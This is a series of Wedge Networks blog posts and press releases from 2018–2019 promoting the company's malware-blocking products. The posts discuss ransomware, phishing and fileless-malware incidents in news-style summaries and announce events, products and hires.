Talk with Wedge to Secure Your Smart Cities at the 2019 Smart City Summit and Expo in Taipei, Taiwan

No Gravatar

March 26-29.2019 – 2019 Smart City Summit and Expo – Nangang Exhibition Center – Hall 1, Taipei, TAIWAN – Wedge Networks will be participating at this event with The Canadian Trade Office in Taipei / Alberta Taiwan Office, Booth I-305.  Wedge’s CEO & CTO, Dr. Hongwen Zhang, will be in attendance and will be presenting how Wedge is protecting Smart Cities.  Please visit with Wedge’s team at the event!  If you would like to request a meeting with Wedge’s CEO, please contact us.

Posted in Wedge Channel Partner Forum | Tagged , , | Leave a comment

Even With Adequate Backups in Place, Ransomware Hitting a Network Can Still Cause Disruptions and Have a Financial Impact

No Gravatar

Ransomware is again in the news as of late; this time hitting one of the world’s largest aluminum producers, Norsk Hydro, in Norway.  As reported by Yahoo! Finance, Norsk Hydro was battling to contain a ransomware cyberattack yesterday that caused a halt in parts of its production.  Even with minimal internet exposure to its systems, the company had to shut several metal extrusion and rolled products plants while its giant smelters in Norway were reduced to operating on largely a manual basis.

Classifying it as a classic ransomware attack, the company’s CFO told a news conference that they had not identified the hackers and that the situation was quiet sever.  According to the Norwegian National Security Authority (NNSA), the attack used a virus known as LockerGoga, a relatively new strain of ransomware that encrypts computer files and demands payment.

Norsk Hydro has declined to say whether they would pay the hackers to unlock their systems but had said that because the company has good back-up systems, they had plans to restore them from backup servers.

In this case, thankfully, Norsk Hydro had back-up systems that they could rely on to get the company running again.  Unfortunately, for many other companies, they are not so lucky and would be hard pressed to pay whatever ransom the hackers demand in order to get their information back and their systems up and running again.  Norsk Hydro mentioned that the financial impact on the company has been limited so far and that any impact was mostly from direct labor.  Some of the activities that the company used computers to do, they had to switch to manual labor and add more people.  That and whatever downtime they experienced as a result of remediation efforts to get their systems back online.  External to the company, however, as news of Norsk Hydro’s plant outages hit the market, it pushed aluminum prices to a three-month high on the London Metal Exchange, as well as causing the company’s shares to fall as much as 3.4% before they recovered a bit to trade 0.8% lower.

So, we see that even with good backups in place, the company still suffered in downtime, an increase in labour cost and even a drop in share price.  All of this could have been prevented had they enhanced their security backup systems with a real-time malware prevention system such as Wedge’s Advanced Malware Blocker.  Wedge is a major proponent of Detection and Blocking; stopping malware BEFORE they hit the network, instead of the current mentality of Detect and Remediate.  We feel that once malware has hit the network, it’s already too late and costly remediation efforts will be needed.  With WedgeAMB’s orchestrated network security product, enhancing its Deep Content Inspection with an AI deep learning neural net trained to detect even never-before-seen malware, ransomware attacks, such as the one that hit Norsk Hydro, could be stopped in their tracks, in real-time.  It is disheartening for us to keep hearing of ransomware attacks such as these still occurring, especially when we know that they could have been stopped by the WedgeAMB solution. 

We continue to argue that prevention should be the cure instead of relying on detection and expensive remediation.  Thankfully, many of our customers have the same thoughts as us and are protected from exactly what Norsk Hydro had to experience with the WedgeAMB solution. We are hoping that more will join the “Detect and Block” mentality.

To help organizations protect themselves, Wedge offers its Wedge Advanced Malware Blocker FREE for 90 days.  If you feel that your organization might be interested in and could benefit from a solution that can detect and block malware in real-time, please email our team at info@wedgenetworks.com.

Posted in Industry News, Latest Security News | Tagged , , , , , , | Leave a comment

Ryuk Ransomware – Still Netting CyberCriminals Payouts Through Attacks on Local Governments and Smaller Enterprises – So, What Should They Do?

No Gravatar

Despite better security solutions now available to combat ransomware, old and new strains are still being utilized to great effect. The latest report from Bleeping Computer, is focused on the “Ryuk” ransomware, being used by a group in Eastern Europe to attack municipalities in North America. Borrowing code from the previously seen “Hermes” malware, attributed to the North Korean hacker group Lazarus, the Ryuk strain is hitting smaller government offices, communities and enterprises quite successfully, and in this case, Jackson County ended up having to pay them USD$400,000.

There is a reason hackers are hitting these municipalities and smaller offices. The effects of these ransomware attacks can be enormous, especially for government organizations; reducing activities to a crawl, wreaking havoc on government services, and still costing the organizations ransom in exchange for decryption keys. As noted in the article, Jackson County, Georgia was hit, forcing county offices to revert to paper to do their jobs, slowing operations to a snail’s pace.

Because the county did not have a backup system in place, it either had to take a huge operational hit and be offline for a long period; spending money to rebuild their networks and hopefully incorporate a much needed data backup policy and network security system; or it had to pay the $400,000 ransom, which it ended up doing.

Unfortunately, Jackson County was not the only victim of this new Ryuk ransomware. Major newspapers in the US, whose printing and delivery were greatly affected by attacks in December of 2018, were also not immune. A list of those hit include some major publications, such as the Wall Street Journal, New York Times, Los Angeles Times, Chicago Tribune and Baltimore Sun, to name a few.

However, Jackson County exemplifies the case of small organizations such as municipalities having to continually cut costs to the extent that resources are always scarce for these organizations. The decision facing these CIOs is what sort of solutions could be put into place to battle these attacks and to ensure they will not be affected again?

Wedge’s position is that even if they had the resources to implement a proper data backup and maintenance program, these organizations need to put in place a real-time solution like Wedge Advanced Malware Blocker (WedgeAMB), where ransomware attacks could be detected and blocked before they have a chance to even enter the organizations’ networks. The reasoning is simple –ransomware’s approach today is to encrypt an organization’s resources, but it is easy to paint the picture that in the future, exfiltration of data OUTSIDE the organization is the next step of ransomware’s evolution. You heard it here first!

Together, with its Deep Content Inspection technology, combined with AI-algorithms and multiple malware databases, WedgeAMB can see the content in real-time and block ANY content that is deemed malicious before it has a chance to do any damage. Having such a system in place would definitely have prevented attacks such as the ones perpetrated on Jackson County and the various newspapers.

So we argue that prevention could be the cure instead of relying on detection and expensive remediation and out of our civic responsibility to our municipalities out there, Wedge is offering its Wedge Advanced Malware Blocker FREE for 90 days. Email our team at info@wedgenetworks.com to see how your organization could benefit from a solution that can make ransomware attacks obsolete!

Posted in Industry News, Latest Security News | Tagged , , , , , , | Leave a comment

Separ Malware – Showing That the Simple Attacks are Sometimes the Most Effective

No Gravatar

Over the last week, more has been made public about the Separ Malware / phishing campaign that has been making the rounds, starting at the end of January.  Threatpost states that “it has affected around 200 companies and over 1,000 individuals, located mainly in Southeast Asia, the Middle East, and North America”.  The effectiveness of this malware has been a result of its use of a combination of legitimate executable files and short scripts, with no attempt by the attacker to evade analysis.

Separ’s earlier variants have existed since November 2017, with info-stealers such as this being active as far back as 2013, so it’s not like this is a new malware.  What has allowed this attack to become so effective is that it is launched using legitimate files that are either common within the organizations being attacked or are widely-used administrative tools; with these legitimate files and executables being abused to perform the malicious info-stealing that is the underlying goal.

The attack will start as a phishing email that contains the malicious attachment; often-times a fake pdf document passing itself off as a self-extracting executable, related to normal business activities such as quotations, shipments, etc.  However, once clicked, the self-extractor runs a Visual Basic script that executes a list of short batch scripts with malicious functions; often masquerading as fake adobe-related programs.  Then, it’s off to the races with the scripts changing firewall settings, stealing email and browser credentials, etc.; eventually using TFTP to upload your stolen data.

What makes this attack so successful is that it uses multiple vectors in launching its attack; many of which are not caught by the various malware solutions out on the market since the malware uses legitimate executable files in its attack.  Oftentimes, even the most up-to-date malware databases will not list these files.  Thankfully, there are solutions out there, such as the Wedge Advanced Malware Blocker, with its Deep Content Inspection technology, combined with AI-algorithms, that can see the whole picture and can piece together the multiple vectors of attack that this campaign uses.  Using the deep learning AI-engine, WedgeAMB can catch attacks such as these in their first phase of infection by looking at the various actions of the adobe installer and seeing whether there were any malicious activities occurring, even within this legitimate executable file.

Unlike many other solutions on the market, WedgeAMB is able to reassemble all content in the network stream in real-time and block such content if its intent is malicious.  This provides a clear advantage, especially when attacks such as Separ are utilizing multiple vectors; many of which might be within legitimate files and executables.  

With Separ and other similar attacks on the horizon, organizations should really take a look at solutions that can “see” the whole picture and stop malicious activities in real-time before they can do any damage within their networks.  If you have such Separ problems and are committed to building an infrastructure that can withstand such attacks, why don’t you e-mail us at info@wedgenetworks.com. Our great team of engineers would be very willing to help!

Posted in Industry News, Latest Security News, Wedge BeSecure Community Support Forum | Tagged , , , , , | Leave a comment

Responding to the Need by MSSPs for a Next Generation Secure Web Gateway, Wedge Announces the Release of its Wedge Intelligent Web Shield™

No Gravatar

Mobile World Congress, Barcelona, Spain – February 25th, 2019 – In response to MSSP’s need for in-depth monitoring and visibility, advanced threat detection, and support for mobile/remote office users, Wedge Networks, the global leader in Orchestrated Real-time Threat Prevention, is pleased to announce the release of its Wedge Intelligent Web Shield™ (WedgeIWS™) product under its Wedge Absolute Real-time Protection series.

By adding improved visibility into all layers of network traffic, real-time detection and blocking of advanced threats, and versatile form factors of VM, appliance, or cloud; WedgeIWS™ brings many features that improve on the traditional Secure Web Gateway products currently in the market. According to industry research firm Gartner, in their December 2018 “Critical Capabilities for Secure Web Gateways” publication, “The three primary use cases for secure web gateways (SWGs) are monitoring and visibility (for example, observing user behavior on the internet), advanced threat defense, and protecting remote offices and mobile workers.” WedgeIWS™, part of the Wedge Absolute Real-time Protection product line, with its Deep Content Inspection technology, deep learning AI-based real-time malware detection and blocking, best-of-breed web security intelligence, and flexible deployment and management capabilities, provides a strong solution in the market for all these use cases.

“Managing web security in a cloud connected, service centric era is a very challenging task, not only for SMEs, but also for government and large enterprises. MSSPs are playing an important role in ensuring safe and secure internet usage. They are asking for solutions that can be readily inserted into the newer network topologies such as high-speed 5G mobile networks, IoT networks, SDN, SD-WAN, and asymmetric multi-datacenter networks. Current generation SWGs are having a tough time keeping pace with this trend. The industry has been looking for an upgraded SWG product that can solve these problems.”, said Dr. Hongwen Zhang, CEO & CTO, Wedge Networks.

“We have been using products powered by Wedge’s network security platform for a number of years to provide robust managed security services to our diverse end- customers. The products’ ease of use and Wedge’s exemplary support made that possible. By adding advanced SWG services to the platform, Wedge now gives MSSPs, such as ours, the added edge we need to both provide unparalleled real-time malware prevention but to also be able to offer these services in our client’s ever-changing computing infrastructure.”, stated Dave Hodkinson, Managing Director, Spectrum Computer Solutions, UK. “With WedgeIWS™, MSSPs can deliver to their customers effective and differentiated managed security service to ensure safe and secure computing.”

The WedgeIWS product provides the deepest visibility into network activities with its patented Deep Content Inspection. This serves as a linchpin to insightful, actionable security analytics for its users. As well, with multiple signature and heuristics-based scanning engines, greatly enhanced with an embedded deep-learning neural network and robust services orchestration, Wedge’s new product is an effective managed network security platform for all MSSPs.

About Wedge Networks
Based in Calgary, Canada, Wedge Networks develops cyber security software/solutions for the cloud connected world. The company is focused on providing real-time prevention against advanced threats at the network layer; currently securing nearly 100M endpoints in data/cloud centers across the globe. It sells its products through partners such as VAD/VAR/MSSP/MDR.

Recognized by leading industry experts as a leader in Orchestrated Threat Management, Wedge uses a patented deep content inspection technology to gain deep insights to network application data (MIME objects) for web, email, and data transmissions in high bandwidth/low latency networks that are typical of data/cloud centers. Its platform orchestrates a rich set of security Virtual Network Functions (VNF), including a well-trained Deep Learning Artificial Neural Network to detect and prevent advanced threats from entering the enterprise networks. All these advanced features are packaged as Wedge Absolute Real-time Protection (WedgeARP) and are delivered in VMs, cloud instances, or server appliances. The ability to provide real-time, high efficacy threat prevention with a software-based orchestration architecture makes WedgeARP a tool-of-choice for MSSP/MDR partners to serve their enterprise customers.

For more information on Wedge Networks, visit http://www.wedgenetworks.com/

Media Contacts:
Please forward any media or PR inquiries to: PR@wedgenetworks.com

Posted in Industry News, Latest Security News, Product and Services Updates, Wedge Channel Partner Forum, Wedge News | Tagged , , , , , , | Leave a comment

Android App Store and the Growing Threat to Mobile Devices and the IoT

No Gravatar

As the popularity of the Android OS grows, powering not only phones but increasingly tablets, TV boxes, and a host of other IoT devices; its rapidly increasing install base becomes a double-edged sword.  The Android platform has become quite ubiquitous globally, but, as a result, it has also become a magnet for malware developers and those bad actors and hackers who are keen on breaching its App store security in order to gain access to personal information, to execute phishing attacks and, in general, to cause headaches to users.  This is also why it comes as no surprise when an article showed up a couple of days ago on SlashGear that highlighted that there were a number of Google Play Store apps, that had been downloaded by users over 4 million times, which were found to have been rife with malware and phishing scams built into them.

In this case, almost 30 Android apps found on the Play Store were found to be using a number of malicious tactics such as making it difficult for users to uninstall, displaying full-screen pop-up ads that linked to explicit content, downloading a paid media player, collecting personal information like addresses and phone numbers, along with containing embedded malware and executing phishing scams.

Mobile devices have always been more susceptible to security attacks due to their lower powered computing nature and the inability, or unwillingness, of users to run endpoint protection in order to save battery life.  This is being compounded by the increasing number of IoT devices that are now connecting to the cloud with the same level of computing power as mobile devices and the same inability to protect themselves.  

With the increased risk, how do we ensure data security for mobile phones and safety for IoT devices on such an omnipresent platform?  That is where the likes of Wedge Networks comes in.  One of the key values that Wedge products offer is the ability to protect heterogeneous computing devices (those with a wide variety of different operating systems), detecting and blocking malware, zero days and APTs in the service provider networks and data centers, in real-time before they hit these devices.  

Wedge has been developing deep-learning based antimalware for heterogeneous computing devices such as Windows, Unix/Linux,  Android, iOS, etc. It has been working with  world leading threat intelligence OEM partners, and universities in developing and embedding advanced real-time malware detection and blocking in its products.   The security case of the Google Play store tells us such ability to ensure security and safety for mobile/IoT devices are critical.

Posted in Industry News, Latest Security News, Wedge News | Tagged , , , , , , | Leave a comment

Catering to Increased Demand from Customers, Wedge Networks Announces Additional Bandwidth Options for its Wedge Absolute Real-time Protection™ Series of Products

No Gravatar

CALGARY, Canada – January 31st, 2019 – As a result of ongoing customer and partner demands and requests, Wedge Network, the leader in orchestrated real-time threat prevention, is pleased to announce the addition of new bandwidth offerings for its Wedge Absolute Real-time Protection™ (WedgeARP™) series of products.

Starting immediately, Wedge is offering its WedgeARP™ product family in the following bandwidths: 250 Mbps, 500 Mbps, 2.5 Gbps and 5 Gbps. These enhance the previously offered 100 Mbps, 1 Gbps and 10 Gbps products and provide increased choice for those customers whose networks fall between the previous bandwidth offerings. As with the previous offerings, the new bandwidths will all be available for purchase as an appliance, with associated software, and via VM deployment options and bundles.

Wedge’s enhanced functionality and offerings will provide greater choice and more deployment flexibility with its WedgeARP™ products, providing much needed options for those organizations whose multiple deployment locations require different bandwidth services. This also enables Wedge partners to offer more tailored packages that will better serve their customers’ network and budgetary constraints.

“At Wedge Networks, we work closely with our partners and customers to understand their organization’s product and business requirements.”, said Mr. Steve Chappell, Wedge’s EVP of Global Sales. “We were continually being requested to provide additional bandwidth options for the very diverse customer networks that we are deploying into. These new bandwidth levels and associated products will provide much needed flexibility from the network deployment side as well as strengthens the business case for those organizations that needed more granular pricing.”

About Wedge Networks
Based in Calgary, Canada, Wedge Networks develops cyber security software/solutions for the cloud connected world. The company is focused on providing real-time prevention against advanced threats at the network layer; currently securing nearly 100M endpoints in data/cloud centers across the globe. It sells its products through partners such as VAD/VAR/MSSP/MDR.

Awarded a 2016 Gartner Cool vendor designation, Wedge uses a patented deep content inspection technology to gain deep insights to network application data (MIME objects) for web, email, and data transmissions in high bandwidth/low latency networks that are typical of data/cloud centers. Its platform orchestrates a rich set of security Virtual Network Functions (VNF), including a well-trained Deep Learning Artificial Neural Network to detect and prevent advanced threats from entering the enterprise networks. All these advanced features are packaged as Wedge Absolute Real-time Protection™ (WedgeARP™) and are delivered in VMs, cloud instances, or server appliances. The ability to provide real-time, high efficacy threat prevention with a software-based orchestration architecture makes WedgeARP™ a tool-of-choice for MSSP/MDR partners to serve their enterprise customers.

For more information on Wedge Networks, visit http://www.wedgenetworks.com/

Media Contacts:
Please forward any media or PR inquiries to: PR@wedgenetworks.com

Posted in Industry News, Latest Security News, Product and Services Updates, Wedge Channel Partner Forum | Tagged , , | Leave a comment

Citing Rapid Growth and Expansion Opportunities, Wedge Networks Announces Addition of Regional Sales Director to Support Korean and Japanese Markets

No Gravatar

CALGARY, Canada – January 1st, 2019 – With rapidly growing interest in the global marketplace for Real-time malware prevention products, Wedge Networks has added a new regional director of sales for Korea and Japan, based out of South Korea, to help support increased sales within these markets. Mr. MC Kim, will be joining Wedge, effective immediately, and provides additional regional support for the expanding business opportunities and strong growth that Wedge is seeing.

After graduating with a Master’s Degree in Electronic Engineering from Chung-Ang University, Mr. Kim has been working in the Computer Networking and Security Industry in Korea and APAC, and brings over 29 years of experience in the Enterprise, Government and Telecoms market, covering a wide variety of responsibilities. Prior to joining Wedge Networks, Mr. Kim was head of APAC sales and field operations at HFR, Inc., headquartered in Seoul, South Korea. Other positions held include being the Korean Country Manager for Cyan, Inc., and Irdeto, as well as acting as Regional Sales Director, North APAC, for Bigband Networks. Mr. Kim has also worked at Caspian Networks in Korea and was a sales executive at both Nortel and Newbridge Networks.

“We are excited to welcome Mr. MC Kim to join Wedge Networks’ rapidly growing sales organization. With his dedication and experience we will be able to better serve our expanding customer base in the South Korean and Japanese markets. The Wedge team is looking forward to working with Mr. Kim.”, said Mr. Steve Chappell, Wedge’s EVP of Global Sales.

About Wedge Networks
Based in Calgary, Canada, Wedge Networks develops cyber security software/solutions for the cloud connected world. The company is focused on providing real-time prevention against advanced threats at the network layer; currently securing nearly 100M endpoints in data/cloud centers across the globe. It sells its products through partners such as VAD/VAR/MSSP/MDR.

Awarded a 2016 Gartner Cool vendor designation, Wedge uses a patented deep content inspection technology to gain deep insights to network application data (MIME objects) for web, email, and data transmissions in high bandwidth/low latency networks that are typical of data/cloud centers. Its platform orchestrates a rich set of security Virtual Network Functions (VNF), including a well-trained Deep Learning Artificial Neural Network to detect and prevent advanced threats from entering the enterprise networks. All these advanced features are packaged as Wedge Absolute Real-time Protection (WedgeARP) and are delivered in VMs, cloud instances, or server appliances. The ability to provide real-time, high efficacy threat prevention with a software-based orchestration architecture makes WedgeARP a tool-of-choice for MSSP/MDR partners to serve their enterprise customers.

For more information on Wedge Networks, visit http://www.wedgenetworks.com/

Media Contacts:
Please forward any media or PR inquiries to: PR@wedgenetworks.com

Posted in Wedge Channel Partner Forum, Wedge News | Tagged , , , , , , | Leave a comment

How Wedge Can Prevent Your Organization From Becoming a Statistic

No GravatarStatistics Canada (StatsCan) published a very telling statistic yesterday, as shown in a Globe and Mail news item stating that more than 1 in 5 Canadian businesses were hit by cyberattacks last year. The survey went on to inform that businesses spent $14 Billion on cybersecurity as they confronted the growing risks in the digital world. The most common motive for cyberattacks was an attempt to steal money or to demand a ransom payment, with theft of personal or financial information being less typical. Although theft of information accounted for less than one quarter of cyberattacks, it was the most cited reason for investing in cybersecurity, StatsCan noted.

According to the agency, as Canadian businesses continue to embrace the internet and digital technologies, they are exposed to greater cybersecurity risks and threats; with the impact of these risks and threats on the investment and day-to-day decisions of the businesses not easily understood and often cybersecurity incidents are not reported. According to StatsCan, only 10% of businesses affected by cyberattacks reported it to law enforcement agencies!

This is all about to change for Canadian businesses as of November 1st, 2018, as key provisions of the federal Digital Privacy Act come into effect, requiring companies to tell Canadian consumers when their personal information has been breached. In addition, these companies could face steep fines for violations of these breaches. Although Canadian companies shelled out over $14 Billion in 2017 on cybersecurity staff and contractors, related software and hardware and prevention and recovery measures, this accounted for only one percent of their total revenues.

Based on the StatsCan findings, it is expected that spending will most likely increase as companies shore up their cybersecurity defences. Companies will be looking for something that can not only help defend against these growing attacks but will be needing tools that can garner them much more insight into what is going on in their networks. As we see more and more breaches being announced in the news that have affected larger corporations such as banks, airlines, service providers and other retailers (see such examples as CIBC, Equifax, British Airways, Deloitte, Uber, Walmart), companies of all sizes will be looking for tools that can provide them with absolute real-time prevention against the ever-changing Advanced Threats.

This is where Wedge can help. With its Wedge Absolute Real-time Prevention (WedgeARP) solution, it is able to help protect organizations of all sizes through the orchestration of best-of-breed security algorithms and intelligence, providing advanced cyber protection, in real-time, against new and unknown malware and APTs. All of this is provided in an easy-to-manage product package that can be managed by a corporate IT department or through an MSSP. Utilizing machine learning and advanced analytics, WedgeARP can offer the critical protection as well as network insight needed by organizations in the changing regulatory environment, providing the extra layer of “insurance” that Canadian businesses will need to prevent themselves from becoming one of the growing breach statistics tracked by StatsCan!

Posted in Industry News, Latest Security News, Wedge News | Tagged , , , , , , | Leave a comment

How Does Wedge Deal With Fileless Malware Hitting Windows 10?

No GravatarFileless Malware on Windows 10 has become a hot topic as of late due to its potential for affecting millions of enterprise customers using Windows 10 around the world.  It poses real danger to these customers, compromising their system security by executing a file without being written to disk.  As such, it was recently posed to our tech gurus here at Wedge, asking how we deal with the recent spate of Fileless Malware that has hit Windows 10.

To start, what is “Fileless Malware”? This is a marketing term used by certain vendors that typically refers to two types of attacks:

1. Malicious activities carried out by the macros of windows documents that are only executed in memory.

2. Hackers exploiting known vulnerabilities using network intrusion techniques.

In a ZDNet article that was published today Microsoft states that it has been working on an answer to some new techniques used in penetration-testing kits to bypass its Windows Defender Advanced Threat Protection (ATP). This is Microsoft’s key security platform for protecting Windows 10 in the enterprise. Microsoft had reported that it had detected two instances of Fileless Malware being used to deliver information stealers that run in memory without an executable file being written to disk. The malware that Microsoft detected relies on techniques from penetration-testing toolkit Sharpshooter, which generates payloads in multiple Windows formats and that can avoid detection by enterprise anti-malware products. You can read more about how Microsoft tries to stop these Fileless Malware in the ZDNet article.

As for how Wedge deals with this problem, instead of trying to detect this type of malware the way Microsoft is attempting to (they do this by implementing a detection algorithm based on runtime activity and leveraging AMSI support (Microsoft’s interface for anti-malware products, including Windows Defender) in scripting engines, targeting a generic malicious behaviour and a fingerprint of the malicious fillers technique), Wedge instead works at the network layer and views the content as a whole, providing an extra layer of protection to enhance what Microsoft is doing with their endpoint protection.  In those cases where Windows Defender is not deployed, or even in those cases where the endpoint is using an operating system other than Windows 10, WedgeARP AMB, installed at the network layer would still provide protection against Fileless Malware!  For the two types of attacks listed above:

1. If the malicious macro is actually in the macro, these would be stopped by WedgeARP AMB defences when the document passes through due to the advanced detection and blocking heuristics and the state of the art machine learning that makes up the WedgeARP system. If the macro does not contain malicious code but simply triggers a download of another malware, WedgeARP would also detect this activity and the actual malware would be stopped.

2. As for hackers exploiting known vulnerabilities using network intrusion techniques, these activities would be immediately stopped by the IPS layer of the WedgeARP AMB solution.

So, in conclusion, with any of these cases, enterprise customers can feel safe if WedgeARP AMB is deployed by their organization to protect their endpoints; Fileless Malware attacks on these protected endpoints would be stopped in their tracks.

Posted in Industry News, Latest Security News, Wedge News | Tagged , , , | Leave a comment